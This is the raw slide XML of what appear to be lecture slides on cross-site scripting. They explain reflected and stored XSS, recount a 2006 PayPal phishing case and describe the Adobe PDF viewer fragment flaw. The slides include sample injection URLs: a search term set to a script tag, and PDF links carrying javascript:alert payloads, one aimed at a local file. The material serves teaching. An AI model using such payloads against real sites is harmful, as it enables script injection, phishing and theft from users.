          <a:xfrm>
            <a:off x="7170738" y="4446588"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15367" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="609600"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="2286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5369" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6773863" y="4019550"/>
            <a:ext cx="1760537"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5370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="29718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5372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2392363" y="982663"/>
            <a:ext cx="2192337" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="2986088"/>
            <a:ext cx="2570163" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3665538"/>
            <a:ext cx="3000375" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3105150"/>
            <a:ext cx="5021263" cy="1619250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944688"/>
            <a:ext cx="4457700" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4362450"/>
            <a:ext cx="5334000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="50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www.victim.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1639888"/>
            <a:ext cx="4457700" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75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www.attacker.com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is XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Others, such as DOM-based attacks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741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741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741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741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741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1741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7417"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4107" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2954338" y="1663700"/>
            <a:ext cx="2209800"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Collect email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2616200" y="2270125"/>
            <a:ext cx="2522538"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send malicious email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17420"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7421"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7422"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7423"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7424"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7425"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7426"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7427"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7428"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7429"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7430"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25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1676400"/>
            <a:ext cx="1685925" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17432"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            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>2006 Example Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Victims were then redirected to a phishing site and prompted to enter sensitive financial data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>			Source: http://www.acunetix.com/news/paypal.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2" descr="PayPal">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect r="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="533400"/>
            <a:ext cx="1778000"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209800"/>
            <a:ext cx="7543800" cy="101600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19459" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adobe PDF viewer “feature”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PDF documents execute JavaScript code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>code_here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The code will be executed in the context of the domain where the PDF files is hosted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> be used against PDF files hosted on the local filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="1047750"/>
            <a:ext cx="2058988" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(version &lt;= 7.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6215063"/>
            <a:ext cx="8550275" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html</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048000"/>
            <a:ext cx="7620000" cy="4000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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Here’s how the attack works:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7924800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker locates a PDF file hosted on website.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  http://website.com/path/to/file.pdf#s=javascript:alert(”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”);) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the victim has Adobe Acrobat Reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="7494167" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: alert is just an example. Real attacks do something worse.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362200"/>
            <a:ext cx="7543800" cy="16319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21507" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>And if that doesn’t bother you...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>PDF files on the local filesystem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>JavaScript Malware now runs in local context with the ability to read local files ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:b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code injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
